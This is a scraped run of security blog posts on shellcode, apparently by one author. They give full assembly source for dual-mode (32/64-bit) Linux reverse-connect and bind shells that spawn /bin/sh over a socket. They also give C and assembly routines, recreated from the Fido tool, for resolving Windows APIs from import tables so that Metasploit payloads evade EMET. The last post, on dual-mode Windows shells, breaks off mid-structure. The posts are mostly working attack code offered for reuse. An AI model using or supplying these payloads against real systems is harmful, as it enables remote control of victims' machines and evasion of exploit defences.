Shellcode: Dual Mode (x86 + x86-64) Linux shellcode

Introduction

Someone asked me recently what do you mean by “dual mode shellcode”? and it seems the wording is slightly ambiguous to those unfamiliar with the different operating modes of a CPU like x86 so I just wanted to clarify through some codes written for Linux.

All “dual mode” means is that the shellcode will run successfully in either legacy mode (32-bit) or long mode (64-bit) and that’s it.

You can’t really call them multiplatform because they only run on Linux and you can’t call them multi-architecture because they only run on the x86 cpu.

So I propose calling them “dual mode” or x84 but feel free to call ’em whatever you want.

They work by exploiting x86 REX prefixes like the dual mode code for windows shown here

x86-64 Linux shellcodes were documented last year and here are some dual mode versions.

The sources below are using 32-bit instructions to provide some clarity but will also run successfully in 64-bit mode.

Execute /bin/sh

sh

Reverse Connect Shellcode

; 128 byte reverse connect shell
;
; Tested on 32 and 64-bit versions of Linux
;

    bits    32
    
    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = inet_addr("127.0.0.1");
    ; sa.sin_port   = htons(1234);
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x0100007f & 0xFFFFFFFF 
    not     eax
    not     ebx
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi
    stosd
    xchg    eax, ebx
    stosd
    push    esp         ; &sa
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi = s
    xchg    eax, esi    ; esi = 2
    
    ; step 2, assign socket handle to stdin,stdout,stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)
x64_dup2:
    mov     al, 33      ; rax = sys_dup2
    syscall
    sub     esi, 1      ; watch out for that bug ๐Ÿ˜‰
    jns     x64_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; connect (s, &sa, sizeof(sa));
    pop     esi         ; rsi = &sa
    mov     dl, 16      ; rdx = sizeof(sa)
    mov     al, 42      ; rax = sys_connect
    syscall    
    jmp     x84_execve

x86_socket:
    pop     ebp         ; ebp = &sa
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, ebx    ; ebx = s
    
    ; step 2, assign socket to stdin, stdout, stderr
    ; dup2 (s, STDIN_FILENO)
    ; dup2 (s, STDOUT_FILENO)
    ; dup2 (s, STDERR_FILENO)    
    pop     ecx         ; ecx = 2
x86_dup2:
    mov     al, 63      ; eax = sys_dup2
    int     0x80 
    dec     ecx
    jns     x86_dup2    ; jump if not signed
    
    ; step 3, connect to remote host
    ; socketcall (SYS_CONNECT, {s, &sa, sizeof(sa)});
    push    16          ; sizeof(sa) 
    push    ebp         ; &sa
    push    ebx         ; s
    push    esp
    pop     ecx         ; &args
    push    3
    pop     ebx         ; ebx = sys_connect
    mov     al, 102     ; eax = sys_socketcall    
    int     0x80
    
    ; execve("/bin//sh", NULL, NULL);
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Bind Shellcode

; 156 byte bind shell
;
; Tested on 32 and 64-bit versions of Linux
;

    bits 32

    ; sa.sin_family = AF_INET;
    ; sa.sin_addr   = INANY_ADDR;
    ; sa.sin_port   = htons(1234);
    mov     eax, ~0xD2040002 & 0xFFFFFFFF 
    mov     ebx, ~0x00000000 & 0xFFFFFFFF 
    not     eax
    not     ebx
    ; create space for sa
    push    eax
    push    eax
    push    esp
    pop     edi
    stosd
    xchg    eax, ebx
    stosd
    push    esp         ; &sa
    pop     ebp
    
    ; step 1, create a socket
    ; x64: socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    ; x86: socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, IPPROTO_IP});
    xor     eax, eax    ; eax = 0
    cdq                 ; rdx = IPPROTO_IP
    mov     al, 103     ; eax = sys_socketcall
    push    1
    pop     esi         ; rsi = SOCK_STREAM
    push    2
    pop     edi         ; rdi = AF_INET    
    dec     eax
    jnz     x86_socket  ; jump to x86
    mov     al, 41      ; rax = sys_socket
    syscall
    
    xchg    eax, edi    ; edi=s
    
    ; step 2, bind to port 1234 
    ; bind(s, {AF_INET,1234,INADDR_ANY}, 16)
    push    ebp
    pop     esi
    mov     dl, 16
    mov     al, 49
    syscall
    
    ; step 3, listen
    ; listen(s, 0);
    push    eax
    pop     esi
    mov     al, 50
    syscall
    
    ; step 4, accept connections
    ; accept(s, 0, 0);
    mov     al, 43
    syscall
    
    xchg    eax, edi         ; edi=s
    xchg    eax, esi         ; esi=2
    
    ; step 5, assign socket handle to stdin,stdout,stderr
    ; dup2(r, fileno);
dup_loop64:
    mov     al, 33               ; rax=sys_dup2
    syscall
    sub     esi, 1
    jns     dup_loop64       ; jump if not signed   
    jmp     x84_execve
    
x86_socket:
    push    esi         ; save 1
    pop     ebx         ; ebx = SYS_SOCKET
    push    edx         ; IPPROTO_IP
    push    ebx         ; SOCK_STREAM
    push    edi         ; AF_INET
    push    esp             
    pop     ecx         ; ecx = &args 
    int     0x80

    xchg    eax, edi    ; ebx = s

    ; step 2, bind to port 1234
    ; bind (s, &sa, sizeof(sa))
    pop    ebx               ; ebx=2, sys_bind
    pop    esi               ; esi=1
    push   0x10              ; sizeof(sa)
    push   ebp               ; &sa
    push   edi               ; s
    mov    al, 0x66          ; eax=sys_socketcall
    mov    ecx, esp          ; ecx=&args
    int    0x80
    
    mov    [ecx+4], edx      ; clear sa from args
    
    ; step 3, listen for incoming connections
    ; listen (s, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    mov    bl, 4             ; ebx=sys_listen
    int    0x80
    
    ; step 4, accept connections
    ; accept (s, 0, 0);
    mov    al, 0x66          ; eax=sys_socketcall
    inc    ebx               ; ebx=sys_accept
    int    0x80
    
    ; step 5, assign socket to stdin, stdout and stderr
    ; dup2(s, FILENO_STDIN); 
    ; dup2(s, FILENO_STDOUT); 
    ; dup2(s, FILENO_STDERR); 
    push   2
    pop    ecx               ; ecx=2
    xchg   ebx, eax          ; ebx=s
dup_loop:
    mov    al, 0x3f           ; eax=sys_dup2
    int    0x80
    dec    ecx
    jns    dup_loop

    ; execve("/bin//sh", NULL, NULL);
x84_execve:
    cdq                 ; envp = NULL
    xor     esi, esi    ; argv = NULL
    push    eax         ; '\0'
    push    eax         ; null space
    push    eax         ; null space
    push    esp
    pop     ebx         ; ebx = "/bin//sh", 0
    push    ebx         ; save pointer to "/bin//sh", 0
    pop     edi         ; rdi = "/bin//sh", 0
    mov     dword[edi+0], '/bin'
    mov     dword[edi+4], '//sh'
    inc     eax
    jnz     x86_execve
    mov     al, 59      ; rax = sys_execve
    syscall
x86_execve:
    xor     ecx, ecx    ; argv = NULL
    mov     al, 11      ; eax  = sys_execve
    int     0x80

Summary

I’ve uploaded code to exploit-db in event my blog goes offline for any reason. The sources are also in github repo here

Posted in assembly, linux, programming, security, shellcode | Tagged , , , , , | Leave a comment

Shellcode: Fido and how it resolves GetProcAddress and LoadLibraryA

Introduction

A tool to modify existing metasploit payloads for windows called Fido was recently published by Joshua Pitts, the author of Backdoor Factory.

Fido will strip this assembly code responsible for resolving API addresses in the export directory and replace it with 1 of 4 methods that obtain GetProcAddress and LoadLibraryA from the Import directory.

The upgrade enables existing payloads from Metasploit to bypass Enhanced Mitigation Experience Toolkit (EMET) which for those of you who don’t know defends against memory corruption vulnerabilities on legacy systems that do not support Control Flow Guard (CFG)

Due to the Export Address Table (EAT) Access Filtering (EAF) feature in EMET and overall popularity of Metasploit payloads for exploiting vulnerabilities, detection is not difficult hence the motivation behind writing Fido.

As Joshua points out in his presentation, EMET will reach end of life (EOL) on July 31st 2018, by which time Microsoft probably expects most applications to be protected by CFG which is a much more advanced protection against memory corruption vulnerabilities.

Perhaps it’s an optimistic projection developers will migrate to MSVC 2015 just to benefit from CFG but only time will tell.

Here, I’ve recreated in C and x86 assembly the ideas presented by Joshua, mainly to understand what Fido assembly code does and also to try optimize the examples to be more compact.

Some of the code shown here is derived from IAT code shown in Resolving API addresses in memory but won’t use hashes except for the last 2 when searching for external DLL.

So there are 4 options provided by the Fido tool:

Type Description
GPA GPA is in targetbinary IAT (default)
LLAGPA LoadlibraryA(LLA)/GPA is in the targetbinary IAT (smallest shellcode option)
Extern GPA need DLLName or targetbinary to use
Extern LLAGPA need DLLName or targetbinary to use

So let’s examine each approach with both C and assembly code.

GPA

If the executable image being exploited imports GetProcAddress already, we just need to access the address from kernel32.dll which should be in the Import Address Table (IAT).

A bit of trivia for you: Locating GetProcAddress in IAT was used in a Win32 computer virus called Cabanas by Jacky Qwerty/29A… published 20 years ago!

get_proc_address

gpa.c here

// locate kernel32.dll
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress
      rva   = imp->OriginalFirstThunk;
      oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
      
      rva   = imp->FirstThunk;
      ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
        
      for (gpa=NULL;; oft++, ft++) 
      {
        rva  = oft->u1.AddressOfData;
        ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
        name = (PDWORD)ibn->Name;
        
        // is this GetProcAddress?
        if (name[0] == 'PteG' && name[2] == 'erdd') {
          gpa = (LPVOID)ft->u1.Function;
          break;
        }
      }
    }
  }

The assembly code doesn’t have any bounds checking although it would be trivial enough to enable. We only check for ordinals and skip those to avoid crashing during the compare for GetProcAddress string.

The DLL name is converted to lowercase using 0x20202020 which may or may not be required. It assumes GetProcAddress is imported by the executable module and that it’s imported from kernel32.dll.

; returns pointer to GetProcAddress in ebp
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx
    mov    ebx, [fs:edx]      ; ebx = peb
    mov    ebx, [ebx+08h]     ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]     ; edx += e_lfanew
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0           ; get next DLL if not equal
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0           ; get next DLL if not equal
    
    lea    esi, [ebp+ebx]   ; esi = OriginalFirstThunk
    add    edi, ebx         ; edi = FirstThunk
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals 
    
    cmp    dword[eax+ebx+2], 'GetP'
    jnz    imp_l1
    
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

LLAGPA

The next bit of code resolves address of both LoadLibraryA and GetProcAddress from kernel32.dll assuming the image imports both.

llagpa.c here

LPVOID get_imp(PIMAGE_IMPORT_DESCRIPTOR imp, 
    LPVOID base, PDWORD api)
{
  PDWORD                   name;
  LPVOID                   api_adr;
  PIMAGE_THUNK_DATA        oft, ft;
  PIMAGE_IMPORT_BY_NAME    ibn;
  DWORD                    rva;
  
  rva   = imp->OriginalFirstThunk;
  oft   = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
  
  rva   = imp->FirstThunk;
  ft    = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
    
  for (;; oft++, ft++) 
  {
    // no API left?
    if (oft->u1.AddressOfData==0) break;
    // skip ordinals
    if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
    
    rva  = oft->u1.AddressOfData;
    ibn  = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
    name = (PDWORD)ibn->Name;
    
    // have we a match?
    if (name[0] == api[0] && name[1] == api[1]) {
      api_adr = (LPVOID)ft->u1.Function;
      break;
    }
  }
  return api_adr;  
}

Then the code which calls get_imp()

// locate kernel32.dll
  for (;imp->Name!=0;imp++) 
  {
    dll = RVA2VA(PDWORD, base, imp->Name);
    if ((dll[0] | 0x20202020) == 'nrek' && 
        (dll[1] | 0x20202020) == '23le')
    { 
      // now locate GetProcAddress and LoadLibraryA
      lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
      gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
      break;
    }
  }

As before with previous GPA code, there is no bounds checking. It assumes both the API are imported from kernel32.dll

; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress

    push   esi
    push   edi
    
    push   30h
    pop    edx
    
    mov    ebx, [fs:edx]     ; ebx = peb
    mov    ebx, [ebx+08h]    ; ebx = ImageBaseAddress
    add    edx, [ebx+3ch]    ; edx += e_lfanew
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                    ; OriginalFirstThunk +00h
    xchg   eax, ebp          ; store in ebp
    lodsd                    ; TimeDateStamp      +04h
    lodsd                    ; ForwarderChain     +08h
    lodsd                    ; Name               +0Ch
    xchg   eax, edx          ; store in edx
    lodsd                    ; FirstThunk         +10h 
    xchg   eax, edi          ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h    ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
    
    ; locate GetProcAddress
    mov    ecx, 'GetP'
    mov    edx, 'ddre'
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'
    mov    edx, 'aryA'
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    js     gi_l0              ; skip ordinals 
    
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    mov    eax, [edi-4]       ; eax = ft->u1.Function
gi_l1: 
    pop    edi
    pop    esi
    ret

Extern GPA

If the executable doesn’t import GetProcAddress, we obtain it from a DLL that does.
The main difference is that we locate the DLL by hash in the PEB and then search through its imports. Here, I’m using ADVAPI32.DLL as example although you would presumably check what DLL the executable imports API from.

extern_gpa.c here

// for each DLL loaded
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL
    dll = dte->BaseDllName.Buffer;

    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    
    // is this our target DLL?
    if (hash == DLL_HASH) 
    {      
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
  
      // locate kernel32.dll
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {
          // locate GetProcAddress
          rva = imp->OriginalFirstThunk;
          oft = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
          
          rva = imp->FirstThunk;
          ft  = (PIMAGE_THUNK_DATA)RVA2VA(ULONG_PTR, base, rva);
            
          for (;; oft++, ft++) 
          {
            rva = oft->u1.AddressOfData;
            if (rva==0) break;
            
            ibn = (PIMAGE_IMPORT_BY_NAME)RVA2VA(ULONG_PTR, base, rva);
            name = (PDWORD)ibn->Name;
            
            // is this GetProcAddress?
            if (name[0] == 'PteG' && name[2] == 'erdd') {
              gpa = (LPVOID)ft->u1.Function;
              break;
            }
          }
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress

If either of the conditions above aren’t true, this code will crash. I’m using the following macro for YASM/NASM to calculate the hash of a string and compare the result in edx.

; macro that converts string to lowercase 
%macro cmpms 1.nolist
  %assign %%h 0  
  %strlen %%len %1
  %assign %%i 1
  
  %rep %%len
    %substr %%c %1 %%i
    %assign %%h ((%%h >> 13) & 0FFFFFFFFh) | (%%h << (32-13))
    %assign %%c (%%c | 0x20)    
    %assign %%h ((%%h + %%c) & 0FFFFFFFFh)
    %assign %%i (%%i+1)
  %endrep
  ; cmp edx, hash
  db 081h, 0fah
  dd %%h
%endmacro
; returns pointer to GetProcAddress in ebp
    push   esi
    push   edi
    push   ebx
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; eax = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:    
    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink    
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
gapi_l1:
    push   edx 
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1
    xor    eax, eax
    cdq
gapi_l2:
    lodsw
    or     al, 0x20
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; we have it, locate GetProcAddress
    lea    esi, [ebp+ebx]
    add    edi, ebx
imp_l1:
    lodsd                   ; eax = oft->u1.Function, oft++;
    scasd                   ; ft++;
    test   eax, eax
    js     imp_l1           ; skip ordinals 
    
    cmp    dword[eax+ebx+ 2], 'GetP'
    jnz    imp_l1
    
    cmp    dword[eax+ebx+10], 'ddre'
    jnz    imp_l1
    
    mov    ebp, [edi-4]     ; ebp = ft->u1.Function
    
    pop    ebx
    pop    edi
    pop    esi
    ret

Extern LLAGPA

If the executable doesn’t import GetProcAddress and LoadLibraryA, we obtain it from a DLL that does.

extern_llagpa.c here

// for each DLL in PEB
  for (dte=(PLDR_DATA_TABLE_ENTRY)ldr->InLoadOrderModuleList.Flink;
       dte->DllBase != NULL && gpa == NULL; 
       dte=(PLDR_DATA_TABLE_ENTRY)dte->InLoadOrderLinks.Flink)
  {
    // hash the DLL name
    dll = dte->BaseDllName.Buffer;

    for (hash=0, i=0; i<dte->BaseDllName.Length/2; i++) {
      hash = ROTR32(hash, 13); 
      hash += dll[i] | 0x20;  
    }
    // is this the target DLL?
    if (hash == DLL_HASH)
    {
      base = dte->DllBase;
      dos  = (PIMAGE_DOS_HEADER)base;
      nt   = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
      dir  = (PIMAGE_DATA_DIRECTORY)nt->OptionalHeader.DataDirectory;
      rva  = dir[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;  
      imp  = (PIMAGE_IMPORT_DESCRIPTOR) RVA2VA(ULONG_PTR, base, rva);
    
      // locate kernel32.dll descriptor
      for (;imp->Name!=0;imp++) 
      {
        name = RVA2VA(PDWORD, base, imp->Name);
        
        if ((name[0] | 0x20202020) == 'nrek' && 
            (name[1] | 0x20202020) == '23le')
        {        
          // locate GetProcAddress and LoadLibraryA
          lla = get_imp(imp, base, (PDWORD)"LoadLibraryA");
          gpa = get_imp(imp, base, (PDWORD)"GetProcAddress");
          break;
        }
      }
    }
  }

The assembly code makes the following assumptions:

  1. ADVAPI32.DLL is loaded into process space and can be found in the PEB
  2. ADVAPI32.DLL imports GetProcAddress
  3. ADVAPI32.DLL imports LoadLibraryA
; returns    
;   ebx = pointer to LoadLibraryA    
;   ebp = pointer to GetProcAddress
    push   esi
    push   edi
    
    push   30h
    pop    edx

    mov    esi, [fs:edx]  ; eax = (PPEB) __readfsdword(0x30);
    mov    esi, [esi+0ch] ; eax = (PMY_PEB_LDR_DATA)peb->Ldr
    mov    edi, [esi+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
gapi_l0:
    mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink  
    mov    ebx, [edi+18h] ; ebx = dte->DllBase
gapi_l1:
    push   edx 
    movzx  ecx, word[edi+44]  ; ecx = BaseDllName.Length
    mov    esi, [edi+48]      ; esi = BaseDllName.Buffer
    shr    ecx, 1
    xor    eax, eax
    cdq
gapi_l2:
    lodsw
    or     al, 0x20
    ror    edx, 13
    add    edx, eax
    loop   gapi_l2
    ; target DLL?
    cmpms  "advapi32.dll"
    pop    edx
    jne    gapi_l0    
   
    ; we have target DLL, now search for kernel32.dll
    ; in import directory
    ; edx += IMAGE_DOS_HEADER.e_lfanew
    add    edx, [ebx+3ch]  
    mov    esi, [ebx+edx+50h]
    add    esi, ebx
imp_l0:
    lodsd                   ; OriginalFirstThunk +00h
    xchg   eax, ebp         ; store in ebp
    lodsd                   ; TimeDateStamp      +04h
    lodsd                   ; ForwarderChain     +08h
    lodsd                   ; Name               +0Ch
    xchg   eax, edx         ; store in edx
    lodsd                   ; FirstThunk         +10h 
    xchg   eax, edi         ; store in edi
    
    mov    eax, [edx+ebx]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'kern'
    jnz    imp_l0
    
    mov    eax, [edx+ebx+4]
    or     eax, 20202020h   ; convert to lowercase
    cmp    eax, 'el32'
    jnz    imp_l0
 
    ; locate GetProcAddress
    mov    ecx, 'GetP'
    mov    edx, 'ddre'
    call   get_imp
    push   eax               ; save pointer 
    
    ; locate LoadLibraryA
    mov    ecx, 'Load'
    mov    edx, 'aryA'
    call   get_imp
    pop    ebp               ; ebp = GetProcAddress
    xchg   eax, ebx          ; ebx = LoadLibraryA
    
    pop    edi
    pop    esi
    ret

    ; -------------
get_imp:
    push   esi
    push   edi
    lea    esi, [ebp+ebx]     ; esi = OriginalFirstThunk + base
    add    edi, ebx           ; edi = FirstThunk + base
gi_l0:
    lodsd                     ; eax = oft->u1.Function, oft++;
    scasd                     ; ft++;
    test   eax, eax
    jz     gi_l1              ; get next module if zero
    js     gi_l0              ; skip ordinals 
    
    cmp    dword[eax+ebx+2], ecx
    jnz    gi_l0

    cmp    dword[eax+ebx+10], edx
    jnz    gi_l0
    
    mov    eax, [edi-4]       ; eax = ft->u1.Function
gi_l1:
    pop    edi
    pop    esi
    ret

Summary

The current size of codes although they may shrink/expand in the future.

Type x86 Size
GPA 99
LLAGPA 127
Extern GPA 140
Extern LLAGPA 170
Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , , , , | Leave a comment

Shellcode: Dual mode PIC for x86 (Reverse and Bind Shells for Windows)

Introduction

In a nutshell, we’re mixing 32 and 64-bit x86 opcodes so that regardless of the operating system mode (legacy or long), our Position Independent Code (PIC) will still execute successfully. Although some of the code requires conditional jumps, we try avoid these where ever possible.

Writing code to run on both 32 and 64-bit windows has usually required 2 entirely different source codes. The exception was when Peter Ferrie published code to execute calc.exe in both CPU modes. Here we try extend his idea for a connect and bind shell.

Searching for API addresses in the export table uses a similar approach to Peter’s code using conditional jumps.

Because of the different calling conventions (Microsoft x64 vs stdcall) and number of parameters for each API, the actual call to an API is made from seperate pieces of code we refer to as “dispatchers”.

The resulting code is not 100% dual mode but it’s possible using a different approach to what’s shown here. The reason I don’t discuss a 100% dual mode assembly is because it requires more space.

Linux

Here’s a simple dual mode x86 shellcode for Linux just to show how easy it is. ๐Ÿ˜‰

shx

Calling Conventions

32-bit Windows API use Standard Calling convention (stdcall). 64-bit Windows API use Microsoft x64 calling convention which is similar to fastcall or the AMD64 ABI used by Linux/BSD/OSX.

  • Legacy Mode (32-bit)

With stdcall, all parameters to a function are placed on the stack (normally using the PUSH instruction). Before returning to caller, the callee removes parameters (normally using RETN instruction). For cdecl convention, you’ll normally see stack fixed by caller using ADD instruction.

Registers EAX, ECX and EDX are volatile and should be presumed destroyed by function calls.

Registers EBX, ESI, EDI and EBP are non-volatile and must be saved and restored by any function that uses them.

  • Long Mode (64-bit)

The first 4 parameters are placed in RCX, RDX, R8 and R9 in that order. The remaining are placed on the stack. For MSVC compiler, the 5th and any additional parameters are normally stored in stack space using the MOV instruction so as to avoid stack misalignment. The callee does not need to alter the stack before returning.

Registers RAX, RCX, RDX, R8, R9, R10, R11 are volatile and should be presumed destroyed by function calls.

Registers RBX, RBP, RDI, RSI, RSP, R12, R13, R14, and R15 are non-volatile and must be saved and restored by any function that uses them.

Mode detection

Detecting between 2 modes can be achieved using REX prefixes and the flags register, specifically status flags that can be used to make decisions, thus controlling the flow of execution.

Although both NASM and YASM assemblers provide the operand size prefix o64 which is essentially emitting 0x48 at assembly time, we don’t use that here.

flags

The x64 prefix 0x48 which is also a 32-bit opcode for ‘DEC EAX’ will affect the Sign Flag (SF) if EAX is initially zero. Setting EAX to zero first using SUB/XOR/AND will also set the Zero Flag (ZF) to 1.

Actually, even if EAX is not zero before DEC EAX, so long as the result is signed (0x80000000 and above) SF will still be 1. You can also play around with various other conditional jumps; JL/JG for example.

For this code, we’ll perform conditional jumps based on ZF and SF flags.

Jump if Not Zero (JNZ) or Jump if Zero (JZ).

If testing the result of REX prefix, we use Jump if Not Sign (JNS) or Jump if Sign (JS).

There are probably lots of ways to detect between modes so don’t limit your own code to this one approach.

Take the following code when executed in 32-bit mode.

;
    xor    eax, eax
    dec    eax
    js     x32

First, we set the Zero Flag (ZF) to 1 with XOR EAX, EAX. The CPU will then follow through with the jump to x32 because the result of ‘DEC EAX’ will set SF to 1 and ZF to 0. You could alternatively use JNZ instead of JS; both are fine. If jumping to x64 code, you can use JZ or JNS.

In 64-bit mode however, the CPU will ignore the jump because “DEC EAX” or 0x48 is of course a prefix used for 64-bit operations and so the Sign Flag (SF) is unaffected and ZF remains 1.

We need to avoid using EAX when possible. It’s typically only used in final code for detection purposes. You can also use ‘INC EAX’ to affect flags register which is what you see used in the Linux shellcode above.

Home space for 64-bit mode

When you call an API in 64-bit mode, the OS expects 32 bytes of free stack sometimes referred to as home space or Shadow Space depending on who you talk to. It will optionally save RCX, RDX, R8 and R9 here.

x64_hs

When the OS attempts to access API parameters, it will expect them at [rsp+40] or [rsp+28h] as illustrated. 32 bytes are for home space and 8 for return address.

Stack and Structure alignment

For 64-bit mode, the stack must be aligned by 16 bytes minus 8 before calling an API so that SSE2 instructions execute without causing exceptions. It should be 16 minus 8 because once our call to an API is made, the return address will occupy 8 bytes, thus aligning the stack by 16.

Since we’re dealing with both stdcall and Microsoft x64 calling conventions, I’ve opted to push all parameters on the stack and then use a separate piece of code for 64-bit mode.

Structures for 64-bit code obviously have to be aligned by 8 bytes. Although the assembly code does not define any structures, it’s important to know the offset of each field in a structure for both 32 and 64-bit mode.

STARTUPINFO for example defines 2 WORD values (wShowWindow and cbReserved2) which are aligned by 8 as you can see by offset of the lpReserved2 field.

typedef struct _STARTUPINFOA {
